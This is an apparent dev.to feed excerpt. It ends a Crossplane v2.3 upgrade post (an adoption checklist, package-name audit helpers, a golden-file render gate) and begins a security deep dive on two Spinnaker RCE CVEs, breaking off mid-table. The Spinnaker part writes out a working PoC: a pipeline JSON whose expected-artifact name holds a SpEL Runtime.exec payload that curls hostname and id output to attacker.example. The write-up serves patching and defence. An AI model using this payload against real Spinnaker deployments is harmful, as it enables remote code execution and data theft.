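&lt;p&gt;The Step 1 check hinges on what "fully qualified" means. A minimal sketch that borrows Docker's reference-parsing heuristic: the part before the first &lt;code&gt;/&lt;/code&gt; names a registry only if it contains a &lt;code&gt;.&lt;/code&gt; or &lt;code&gt;:&lt;/code&gt;, or is &lt;code&gt;localhost&lt;/code&gt;. Whether Crossplane applies exactly this rule is an assumption; &lt;code&gt;is_fully_qualified&lt;/code&gt; is a hypothetical helper.&lt;/p&gt;

```shell
#!/usr/bin/env bash
# is_fully_qualified PACKAGE_REF
# Succeeds when PACKAGE_REF starts with a registry host, e.g.
#   xpkg.upbound.io/upbound/provider-aws-s3:v1.0.0   -> qualified
#   upbound/provider-aws-s3:v1.0.0                   -> not qualified
is_fully_qualified() {
  local ref=$1 first
  case $ref in
    */*) first=${ref%%/*} ;;
    *) return 1 ;;           # no "/" at all: bare name, no registry
  esac
  case $first in
    *.*|*:*|localhost) return 0 ;;
    *) return 1 ;;
  esac
}

# Usage with the Step 1 listing (kind, name, package separated by tabs):
#   kubectl get pkg -o jsonpath='{range .items[*]}{.kind}{"\t"}{.metadata.name}{"\t"}{.spec.package}{"\n"}{end}' \
#     | while IFS=$'\t' read -r kind name pkg; do
#         is_fully_qualified "$pkg" || echo "NOT FQ: $kind $name $pkg"
#       done
```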



&lt;h2&gt;
  
  
  9. ManoIT In-House Adoption Checklist — Three Control Planes × Sixteen Steps
&lt;/h2&gt;

&lt;p&gt;ManoIT runs three control planes (prod/stage/dev), so we roll the alpha gates out in stages: enable them in staging and soak for one week, then enable them in prod and soak for another week. The full checklist:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;#&lt;/th&gt;
&lt;th&gt;Item&lt;/th&gt;
&lt;th&gt;Owner&lt;/th&gt;
&lt;th&gt;Done when&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;1&lt;/td&gt;
&lt;td&gt;Inventory Crossplane/Provider/Function versions on all three control planes&lt;/td&gt;
&lt;td&gt;Platform&lt;/td&gt;
&lt;td&gt;Merged spreadsheet&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2&lt;/td&gt;
&lt;td&gt;Audit fully qualified package URLs — flag any remaining short names&lt;/td&gt;
&lt;td&gt;Platform&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;kubectl get pkg&lt;/code&gt; shows 0 NOT-FQ&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;3&lt;/td&gt;
&lt;td&gt;Upgrade dev to v2.3.0 (alpha gates OFF)&lt;/td&gt;
&lt;td&gt;Platform&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;crossplane version --server&lt;/code&gt; = v2.3.0&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;4&lt;/td&gt;
&lt;td&gt;Composition regression — render vs. golden&lt;/td&gt;
&lt;td&gt;Service owners&lt;/td&gt;
&lt;td&gt;All diffs = 0&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;5&lt;/td&gt;
&lt;td&gt;Staging: v2.3.0 + &lt;code&gt;--enable-no-op-status-update-skip&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Platform&lt;/td&gt;
&lt;td&gt;1-week soak, ETCD PUT delta report&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;6&lt;/td&gt;
&lt;td&gt;Staging: add &lt;code&gt;--enable-provider-deletion-protection&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Platform&lt;/td&gt;
&lt;td&gt;ClusterUsage auto-created, refused-delete smoke test passes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;7&lt;/td&gt;
&lt;td&gt;Apply &lt;code&gt;crossplane.io/poll-interval&lt;/code&gt; to low-volatility MRs (IAM/VPC)&lt;/td&gt;
&lt;td&gt;Service owners&lt;/td&gt;
&lt;td&gt;≥30% drop in cloud API calls post-apply&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;8&lt;/td&gt;
&lt;td&gt;Standardize force-refresh procedure on &lt;code&gt;reconcile-requested-at&lt;/code&gt; — runbook update&lt;/td&gt;
&lt;td&gt;SRE&lt;/td&gt;
&lt;td&gt;Runbook merged and used in ≥1 incident&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;9&lt;/td&gt;
&lt;td&gt;Upgrade prod to v2.3.0 (alpha gates OFF)&lt;/td&gt;
&lt;td&gt;Platform&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;crossplane version --server&lt;/code&gt; = v2.3.0&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;10&lt;/td&gt;
&lt;td&gt;Prod: &lt;code&gt;--enable-no-op-status-update-skip&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Platform&lt;/td&gt;
&lt;td&gt;1-week soak, etcd PUT + apiserver CPU report&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;11&lt;/td&gt;
&lt;td&gt;Prod: &lt;code&gt;--enable-provider-deletion-protection&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Platform&lt;/td&gt;
&lt;td&gt;ClusterUsage created; tear-down doc updated to "delete ClusterUsage → delete Provider"&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;12&lt;/td&gt;
&lt;td&gt;CI gate added — High-Fidelity Render diff on PRs&lt;/td&gt;
&lt;td&gt;Platform&lt;/td&gt;
&lt;td&gt;Workflow merged, ≥1 regression PR blocked in practice&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;13&lt;/td&gt;
&lt;td&gt;Internal asdf/mise setup installs the Crossplane CLI from the new repo&lt;/td&gt;
&lt;td&gt;Platform&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;asdf install crossplane 2.3.0&lt;/code&gt; works&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;14&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;crossplane beta trace -o yaml&lt;/code&gt; snapshotted daily to Git&lt;/td&gt;
&lt;td&gt;Observability&lt;/td&gt;
&lt;td&gt;Nightly cron job commits the snapshot through an automated PR&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;15&lt;/td&gt;
&lt;td&gt;Prometheus alerts: XR circuit breaker open; ratio of MRs with poll-interval ≥ 24h&lt;/td&gt;
&lt;td&gt;Observability&lt;/td&gt;
&lt;td&gt;Alert PR merged, fire/resolve test passed&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;16&lt;/td&gt;
&lt;td&gt;RFC: alpha gate enablement policy (dev immediate, staging 1w, prod +1w)&lt;/td&gt;
&lt;td&gt;Platform&lt;/td&gt;
&lt;td&gt;RFC merged and added to the quarterly security/release review&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;
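&lt;p&gt;Checklist item 2 is easy to script. The following is a minimal sketch that assumes Docker-style reference rules: a package counts as fully qualified when its first path segment looks like a registry host (it contains a &lt;code&gt;.&lt;/code&gt; or &lt;code&gt;:&lt;/code&gt;, or is &lt;code&gt;localhost&lt;/code&gt;). The helper names and sample package strings are hypothetical. In practice the input would be the &lt;code&gt;spec.package&lt;/code&gt; values of the installed Providers, Functions, and Configurations.&lt;/p&gt;

```python
"""Flag Crossplane package references that are not fully qualified (sketch).

Heuristic (an assumption borrowed from Docker image reference rules):
the first path segment must look like a registry host, i.e. contain
a '.' or ':' or be exactly 'localhost'. Helper names are hypothetical.
"""


def is_fully_qualified(package: str) -> bool:
    # Drop any digest so only the repository path (plus tag) remains.
    repo = package.split("@", 1)[0]
    first, sep, rest = repo.partition("/")
    if not sep or not rest:
        # No slash at all (e.g. "provider-aws:v1") means a short name.
        return False
    return "." in first or ":" in first or first == "localhost"


def short_names(packages):
    """Return the packages that still use short (non-FQ) names."""
    return [p for p in packages if not is_fully_qualified(p)]


if __name__ == "__main__":
    # Illustrative sample data, not real inventory.
    installed = [
        "xpkg.crossplane.io/crossplane-contrib/provider-aws-s3:v1.20.0",
        "crossplane-contrib/provider-kubernetes:v0.15.0",
        "registry.internal.example:5000/platform/function-patch:v0.8.0",
    ]
    offenders = short_names(installed)
    for p in offenders:
        print("NOT-FQ", p)
    print(len(offenders), "short-name package(s) found")
```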

&lt;h2&gt;
  
  
  10. Conclusion — The Inflection Point of "Operationally Trustworthy Control Plane"
&lt;/h2&gt;

&lt;p&gt;The six v2.3 changes can be summed up in one sentence: &lt;strong&gt;"for the first time, the v2 series backs its reliability claim with operational metrics."&lt;/strong&gt; The High-Fidelity Render Engine structurally resolves the six-year "local diverges from cluster" pain. Provider Deletion Protection blocks the top incident scenario behind a single alpha gate. The two reconcile annotations finally give operators the per-resource cadence control they have been asking for. The XR circuit-breaker reset simplifies post-incident recovery. The no-op status update skip cuts etcd write pressure from no-op updates. The CLI repo split opens a faster lane for CLI-side evolution.&lt;/p&gt;

&lt;p&gt;Three things to keep in mind going into adoption:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Stage the alpha gates.&lt;/strong&gt; Keep them OFF in dev while running regression tests, turn them ON in staging for a one-week soak, then enable them in prod and soak for another week.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Re-audit fully qualified package URLs immediately before upgrading.&lt;/strong&gt; v2 rejects short names. Leftover short-name packages will fail controller boot even on a v2.2 → v2.3 minor upgrade.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;The High-Fidelity Render payoff shows up in CI, not at the CLI.&lt;/strong&gt; A single &lt;code&gt;crossplane render&lt;/code&gt; call won't &lt;em&gt;feel&lt;/em&gt; different. Wire render-diff into PR gates and you'll catch composition regressions before merge.&lt;/li&gt;
&lt;/ol&gt;
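&lt;p&gt;The golden-file comparison behind such a PR gate (checklist items 4 and 12) can be very small. The following is a minimal sketch. It assumes the expected output of each composition is committed as &lt;code&gt;golden/*.yaml&lt;/code&gt; and that an earlier CI step has written fresh &lt;code&gt;crossplane render&lt;/code&gt; output to a matching &lt;code&gt;rendered/&lt;/code&gt; directory. The directory layout and function names are hypothetical. Because it compares plain text, harmless key reordering also counts as a diff.&lt;/p&gt;

```python
"""Golden-file gate for rendered Crossplane compositions (sketch).

Directory layout (golden/, rendered/) and function names are hypothetical.
"""
import difflib
import sys
from pathlib import Path


def render_diff(golden: str, rendered: str, name: str = "composition") -> list:
    """Return unified-diff lines between golden and freshly rendered YAML."""
    return list(
        difflib.unified_diff(
            golden.splitlines(keepends=True),
            rendered.splitlines(keepends=True),
            fromfile=f"golden/{name}.yaml",
            tofile=f"rendered/{name}.yaml",
        )
    )


def gate(golden_dir: Path, rendered_dir: Path) -> int:
    """Compare every golden file with its rendered twin; return an exit code."""
    failures = 0
    for golden_path in sorted(golden_dir.glob("*.yaml")):
        rendered_path = rendered_dir / golden_path.name
        if not rendered_path.exists():
            print(f"MISSING render for {golden_path.name}")
            failures += 1
            continue
        diff = render_diff(
            golden_path.read_text(), rendered_path.read_text(), golden_path.stem
        )
        if diff:
            # Print the diff so reviewers see exactly what changed.
            sys.stdout.writelines(diff)
            failures += 1
    return 1 if failures else 0
```

&lt;p&gt;A CI step would call &lt;code&gt;gate(Path("golden"), Path("rendered"))&lt;/code&gt; and exit with the returned code, so any nonzero result blocks the merge.&lt;/p&gt;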

&lt;p&gt;Shortest single-line recommendation: &lt;strong&gt;"Upgrade dev to v2.3 today, enable both alpha gates in staging this week."&lt;/strong&gt;&lt;/p&gt;




&lt;p&gt;&lt;em&gt;Cross-posted from &lt;a href="https://www.manoit.co.kr/forum/view/1478693" rel="noopener noreferrer"&gt;ManoIT Tech Blog&lt;/a&gt;. Authored by the ManoIT Platform Team with AI-assisted drafting (Claude Opus 4.6) on May 27, 2026. All operational figures cited are from internal staging measurements and are reproducible on any cluster of comparable size.&lt;/em&gt;&lt;/p&gt;





</description>
      <category>kubernetes</category>
      <category>cloud</category>
      <category>devops</category>
      <category>cncf</category>
    </item>
    <item>
      <title>Spinnaker 2026.1.0 Emergency Patch — CVE-2026-32613 Echo SpEL RCE + CVE-2026-32604 Clouddriver Gitrepo Shell Injection</title>
      <dc:creator>daniel jeong</dc:creator>
      <pubDate>Tue, 26 May 2026 00:14:56 +0000</pubDate>
      <link>https://dev.to/x4nent/spinnaker-202610-emergency-patch-cve-2026-32613-echo-spel-rce-cve-2026-32604-clouddriver-el7</link>
      <guid>https://dev.to/x4nent/spinnaker-202610-emergency-patch-cve-2026-32613-echo-spel-rce-cve-2026-32604-clouddriver-el7</guid>
      <description>&lt;h1&gt;
  
  
  Spinnaker 2026.1.0 Emergency Patch Deep Dive — CVE-2026-32613 Echo SpEL RCE + CVE-2026-32604 Clouddriver Gitrepo Shell Injection (Double CVSS 9.9 Critical) Redefining the 2026 GitOps Multi-Cloud Delivery Pipeline Security Standard
&lt;/h1&gt;

&lt;p&gt;On April 20, 2026, the Spinnaker security team simultaneously disclosed two CVSS 9.9 Critical remote code execution vulnerabilities. The first is &lt;strong&gt;CVE-2026-32613&lt;/strong&gt; — the Echo service's &lt;em&gt;expected artifacts&lt;/em&gt; evaluation logic fails to restrict the Spring Expression Language (SpEL) context to a trusted class allowlist, allowing an authenticated user to instantiate arbitrary Java classes and execute host commands. The second is &lt;strong&gt;CVE-2026-32604&lt;/strong&gt; — Clouddriver's &lt;code&gt;GitJobArtifactDownloader&lt;/code&gt; interpolates the &lt;code&gt;reference&lt;/code&gt;, &lt;code&gt;version&lt;/code&gt;, and &lt;code&gt;artifactAccount&lt;/code&gt; fields of a gitrepo artifact directly into a &lt;code&gt;sh -c&lt;/code&gt; invocation without validation, so shell metacharacters such as backticks, &lt;code&gt;$(...)&lt;/code&gt;, &lt;code&gt;;&lt;/code&gt;, and &lt;code&gt;&amp;amp;&amp;amp;&lt;/code&gt; are passed straight to the shell, escalating to RCE.&lt;/p&gt;

&lt;p&gt;Both vulnerabilities are &lt;strong&gt;post-authentication&lt;/strong&gt;, but many Spinnaker deployments sit behind a single SSO entry point with permissive RBAC, so the real attack surface is much larger than "auth required" suggests. Patches landed simultaneously across &lt;strong&gt;2026.1.0, 2026.0.1, 2025.4.2, and 2025.3.2&lt;/strong&gt;, and ZeroPath published a PoC for both CVEs the next day: &lt;em&gt;the patch window became the exposure window&lt;/em&gt;. This article decomposes the root cause of each CVE at the level of SpEL context handling and &lt;code&gt;ProcessBuilder&lt;/code&gt; invocation, reconstructs the public PoC at the PR / CLI / Helm values level, and consolidates the phased patching, temporary blocking, and observability strategy ManoIT applied to four internal multi-cloud delivery pipelines, across nine axes.&lt;/p&gt;

&lt;h2&gt;
  
  
  1. Why April 20, 2026 Is the Inflection Point for Spinnaker Security
&lt;/h2&gt;

&lt;p&gt;Spinnaker is a multi-cloud continuous delivery platform open-sourced by Netflix in 2015 and donated to the Continuous Delivery Foundation (CDF) in 2019. Its strength is a distributed architecture of roughly ten microservices (Deck UI, Gate API gateway, Orca orchestrator, Clouddriver cloud abstraction, Echo event router, Igor CI integration, Fiat authorization, Front50 metadata, Kayenta canary, Rosco bakery), but that same split creates &lt;strong&gt;ambiguous trust boundaries between services&lt;/strong&gt;. The two CVEs disclosed on April 20 are a direct result of that ambiguity.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Date&lt;/th&gt;
&lt;th&gt;Event&lt;/th&gt;
&lt;th&gt;Operational Meaning&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;2015.11&lt;/td&gt;
&lt;td&gt;Netflix open-sources Spinnaker&lt;/td&gt;
&lt;td&gt;Start of multi-cloud CD standard&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2019.03&lt;/td&gt;
&lt;td&gt;Founding project of the Continuous Delivery Foundation (CDF)&lt;/td&gt;
&lt;td&gt;Community governance settles&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2024.11&lt;/td&gt;
&lt;td&gt;Spinnaker 2025.0.0 released&lt;/td&gt;
&lt;td&gt;Halyard dependency partially removed, Kubernetes 1.30 support&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2025.07&lt;/td&gt;
&lt;td&gt;Spinnaker 2025.3.0&lt;/td&gt;
&lt;td&gt;Echo SpEL evaluation path expanded (artifact trigger regex)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2025.11&lt;/td&gt;
&lt;td&gt;Spinnaker 2025.4.0&lt;/td&gt;
&lt;td&gt;Clouddriver gitrepo artifact HTTPS basic auth added&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2026.02&lt;/td&gt;
&lt;td&gt;Spinnaker 2026.0.0&lt;/td&gt;
&lt;td&gt;Operator recommended over Halyard, Kubernetes 1.32 support&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2026.04.07&lt;/td&gt;
&lt;td&gt;Spinnaker 2026.0.2 (no security patch)&lt;/td&gt;
&lt;td&gt;Minor bugfix release&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2026.04.20&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;CVE-2026-32613 + CVE-2026-32604 simultaneous disclosure&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Two CVSS 9.9 Critical, same-day patches&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2026.04.20&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Patches 2026.1.0 / 2026.0.1 / 2025.4.2 / 2025.3.2 released&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Four supported lines patched simultaneously, workarounds documented&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2026.04.21&lt;/td&gt;
&lt;td&gt;ZeroPath PoC published (GitHub)&lt;/td&gt;
&lt;td&gt;Patch and exposure windows effectively identical&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2026.05.02&lt;/td&gt;
&lt;td&gt;CCB Belgium national cybersecurity advisory&lt;/td&gt;
&lt;td&gt;"Patch Immediately" — government/finance distribution&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2026.05.15&lt;/td&gt;
&lt;td&gt;Armory, OpsMx etc. commercial distros backport patches&lt;/td&gt;
&lt;td&gt;Enterprise customer notification emails&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Two rows matter most operationally. (1) &lt;em&gt;The patch and the PoC dropped within a day of each other&lt;/em&gt;: teams assuming a one-month patch grace period had about 24 hours to decide. (2) &lt;em&gt;Four release lines were patched simultaneously&lt;/em&gt;: Spinnaker effectively treats &lt;code&gt;2025.3.x&lt;/code&gt;, &lt;code&gt;2025.4.x&lt;/code&gt;, &lt;code&gt;2026.0.x&lt;/code&gt;, and &lt;code&gt;2026.1.x&lt;/code&gt; as supported lines, and the vulnerable code lived in all four, so &lt;em&gt;downgrading is not a viable mitigation&lt;/em&gt;.&lt;/p&gt;

&lt;h2&gt;
  
  
  2. CVE-2026-32613 — Echo Service SpEL Context-Unrestricted RCE
&lt;/h2&gt;

&lt;p&gt;The first CVE lives in Echo's &lt;code&gt;echo-pipelinetriggers&lt;/code&gt; module. Echo is Spinnaker's event router — it receives external events (CI build completion, Pub/Sub, scheduled times, artifact changes) and fires the registered pipelines. During this flow it evaluates &lt;em&gt;expected artifacts&lt;/em&gt; (the artifacts a pipeline waits for) using Spring Expression Language.&lt;/p&gt;

&lt;h3&gt;
  
  
  2.1 Root Cause — Inconsistent SpEL Context Handling Between Orca and Echo
&lt;/h3&gt;

&lt;p&gt;Spinnaker's Orca (the pipeline orchestrator) restricts the SpEL evaluation context to a &lt;strong&gt;trusted class allowlist&lt;/strong&gt;. This is the standard pattern adopted after a series of SpEL injection issues reported in 2019. However, Echo's &lt;code&gt;expected artifacts&lt;/code&gt; evaluation path missed applying this allowlist, leaving &lt;strong&gt;SpEL with full JVM class access&lt;/strong&gt;.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Axis&lt;/th&gt;
&lt;th&gt;Orca (safe)&lt;/th&gt;
&lt;th&gt;Echo (vulnerable, pre-patch)&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;SpEL ParserContext&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;StandardEvaluationContext&lt;/code&gt; + &lt;strong&gt;trusted class allowlist&lt;/strong&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;StandardEvaluationContext&lt;/code&gt; (unrestricted)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Accessible classes&lt;/td&gt;
&lt;td&gt;Spinnaker context vars + allowlisted classes&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Entire JVM (incl. java.lang.Runtime)&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;code&gt;T(...)&lt;/code&gt; operator&lt;/td&gt;
&lt;td&gt;Allowlist only&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Arbitrary classes allowed&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Reflection calls&lt;/td&gt;
&lt;td&gt;Blocked&lt;/td&gt;
&lt;td&gt;Available&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Arbitrary method invocation&lt;/td&gt;
&lt;td&gt;Allowlisted methods only&lt;/td&gt;
&lt;td&gt;All public methods&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Post-2019 SpEL CVE response&lt;/td&gt;
&lt;td&gt;Applied&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Missed (undetected for years)&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;The most painful row is the last one. The protection Orca adopted after the 2019 SpEL issues never reached Echo's expected-artifacts evaluation path, and the gap went unnoticed for years. The patch closes exactly that gap: Echo's SpEL context now uses the same trusted class allowlist as Orca. &lt;strong&gt;The patch itself is around 30 lines of change&lt;/strong&gt;, but for as long as those 30 lines were missing, every Spinnaker instance was exposed.&lt;/p&gt;

&lt;h3&gt;
  
  
  2.2 Attack Scenario — Poisoning an Expected Artifact Field with a SpEL Payload
&lt;/h3&gt;

&lt;p&gt;Assume the attacker compromised an account with &lt;code&gt;roles=APPLICATION_OWNER&lt;/code&gt; (the most common Spinnaker user role). The attack flow:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# 1) Log in to Spinnaker Gate API, capture session cookie&lt;/span&gt;
&lt;span class="nv"&gt;GATE&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"https://gate.spinnaker.example.com"&lt;/span&gt;
curl &lt;span class="nt"&gt;-sS&lt;/span&gt; &lt;span class="nt"&gt;-c&lt;/span&gt; cookies.txt &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;GATE&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;&lt;span class="s2"&gt;/login/google"&lt;/span&gt; &lt;span class="nt"&gt;-d&lt;/span&gt; &lt;span class="s2"&gt;"username=victim&amp;amp;password=..."&lt;/span&gt;

&lt;span class="c"&gt;# 2) Create a new pipeline (or edit an existing one)&lt;/span&gt;
&lt;span class="c"&gt;# Inject SpEL payload into the expected artifact's name field&lt;/span&gt;
&lt;span class="nb"&gt;cat&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; pipeline.json &lt;span class="o"&gt;&amp;lt;&amp;lt;&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="no"&gt;JSON&lt;/span&gt;&lt;span class="sh"&gt;'
{
  "application": "marketing",
  "name": "exfil-demo",
  "expectedArtifacts": [{
    "id": "art-0",
    "matchArtifact": {
      "type": "docker/image",
      "name": "&lt;/span&gt;&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;T&lt;/span&gt;&lt;span class="p"&gt;(java.lang.Runtime).getRuntime().exec(new String[]{&lt;/span&gt;&lt;span class="s1"&gt;'sh'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="s1"&gt;'-c'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="s1"&gt;'curl https://attacker.example/$(hostname)/$(id)'&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;&lt;span class="sh"&gt;).getInputStream()}",
      "reference": "x"
    },
    "useDefaultArtifact": true,
    "defaultArtifact": {"type": "docker/image", "name": "x", "reference": "x"}
  }],
  "triggers": [{"type": "pubsub", "enabled": true, "pubsubSystem": "google", "subscriptionName": "spinnaker"}],
  "stages": []
}
&lt;/span&gt;&lt;span class="no"&gt;JSON

&lt;/span&gt;&lt;span class="c"&gt;# 3) Save pipeline -&amp;gt; next Pub/Sub event triggers Echo to evaluate the SpEL -&amp;gt; RCE&lt;/span&gt;
curl &lt;span class="nt"&gt;-sS&lt;/span&gt; &lt;span class="nt"&gt;-b&lt;/span&gt; cookies.txt &lt;span class="nt"&gt;-H&lt;/span&gt; &lt;span class="s2"&gt;"Content-Type: application/json"&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;-X&lt;/span&gt; POST &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;GATE&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;&lt;span class="s2"&gt;/pipelines"&lt;/span&gt; &lt;span class="nt"&gt;--data-binary&lt;/span&gt; @pipeline.json
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The key is that &lt;code&gt;${T(java.lang.Runtime).getRuntime().exec(...)}&lt;/code&gt; executes &lt;strong&gt;as-is&lt;/strong&gt; during Echo's SpEL evaluation. &lt;code&gt;T(...)&lt;/code&gt; is the SpEL type-reference operator; with an allowlist in place, &lt;code&gt;java.lang.Runtime&lt;/code&gt; is rejected. Pre-patch Echo had no such rejection logic, so the payload runs &lt;code&gt;sh -c&lt;/code&gt; inside the Echo container and exfiltrates output to an external endpoint.&lt;/p&gt;

&lt;h3&gt;
  
  
  2.3 SpEL Evaluation Code Before and After the Patch
&lt;/h3&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Aspect&lt;/th&gt;
&lt;th&gt;Before patch&lt;/th&gt;
&lt;th&gt;After patch (2026.1.0 / 2025.3.2 backport)&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Evaluation context creation&lt;/td&gt;
&lt;td&gt;&lt;code&gt;new StandardEvaluationContext()&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;SpinnakerSpelEvaluationContext.trusted()&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Type locator&lt;/td&gt;
&lt;td&gt;Default &lt;code&gt;StandardTypeLocator&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Allowlist-based &lt;code&gt;TrustedTypeLocator&lt;/code&gt;&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Allowlisted classes (examples)&lt;/td&gt;
&lt;td&gt;—&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;String&lt;/code&gt;, &lt;code&gt;Math&lt;/code&gt;, &lt;code&gt;Integer&lt;/code&gt;, &lt;code&gt;Long&lt;/code&gt;, &lt;code&gt;Double&lt;/code&gt;, &lt;code&gt;Boolean&lt;/code&gt;, &lt;code&gt;List&lt;/code&gt;, &lt;code&gt;Map&lt;/code&gt;, partial Spinnaker domain models&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Blocked classes (examples)&lt;/td&gt;
&lt;td&gt;—&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;java.lang.Runtime&lt;/code&gt;, &lt;code&gt;java.lang.ProcessBuilder&lt;/code&gt;, &lt;code&gt;java.lang.reflect.*&lt;/code&gt;, &lt;code&gt;java.io.File&lt;/code&gt;, etc.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Non-allowlisted class call&lt;/td&gt;
&lt;td&gt;Executes&lt;/td&gt;
&lt;td&gt;&lt;code&gt;SpelEvaluationException: type 'X' is not whitelisted&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Logging&lt;/td&gt;
&lt;td&gt;—&lt;/td&gt;
